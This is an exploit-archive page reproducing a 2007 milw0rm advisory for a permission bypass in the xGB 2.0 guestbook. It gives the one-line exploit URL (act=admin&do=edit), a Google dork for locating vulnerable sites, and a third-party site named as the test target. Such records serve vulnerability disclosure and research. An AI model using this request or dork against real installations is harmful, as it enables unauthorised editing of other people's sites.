header-logo
Suggest Exploit
vendor:
xGB
by:
DarkFuneral
9
CVSS
CRITICAL
Remote Permission Bypass
CWE
Product Name: xGB
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: www.culturebeach.de/guestbook.php
2007

xGB 2.0 (xGB.php) Remote Permission Bypass Vulnerability

An attacker can edit all message in xGB by accessing http://www.site.com/path/xGB.php?act=admin&do=edit

Mitigation:

Source

Exploit-DB raw data:

/*
*
* xGB 2.0 (xGB.php) Remote Permission Bypass Vulnerability
* Bug discovered by DarkFuneral
* http://www.darkfuneral89.altervista.org/
*
* Affected Software: xGB
* CMS Site: "i don't know! :P"
* Severity: Critical
* Description: An attacker can edit all message in xGB
* Google Dork: allinurl:"xGb.php"
*
* E-Mail: darkfuneral89@gmail.com
* 
*
*
*
* Exploit Code: http://www.site.com/path/xGB.php?act=admin&do=edit
*
*
*
* Tested on www.culturebeach.de/guestbook.php
*
* Special Greetz to SystemFAILURE because I Love Him...
*
*/

# milw0rm.com [2007-08-29]

Navigation

Suggest Exploit

Services By CQR